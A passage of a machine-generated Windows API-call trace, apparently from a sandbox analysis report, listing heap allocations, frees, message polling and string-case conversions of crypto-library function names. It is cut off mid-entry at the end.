0x90afd8 [0175.540] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.540] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0175.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc3fc) returned 0xa6f010 [0175.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0175.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0175.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0175.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0175.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc3fc) returned 0xa87820 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0175.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0175.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0175.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0175.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.543] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0175.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0175.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0175.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.544] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.544] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.545] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0175.546] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.547] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0175.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 